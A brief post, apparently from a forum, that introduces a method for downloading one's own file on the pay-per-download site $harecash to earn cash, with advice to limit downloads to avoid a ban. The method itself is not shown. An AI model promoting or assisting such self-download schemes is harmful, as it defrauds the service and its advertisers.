You Can use this method to Download your Own file to Earn some extra cash from $harecash. Please Dont abuse this method.. Download just 2 or 3 times max per day. [I wont be Responsible in anyway if your Account gets Banned or Blocked, Use at your Own Risk ]
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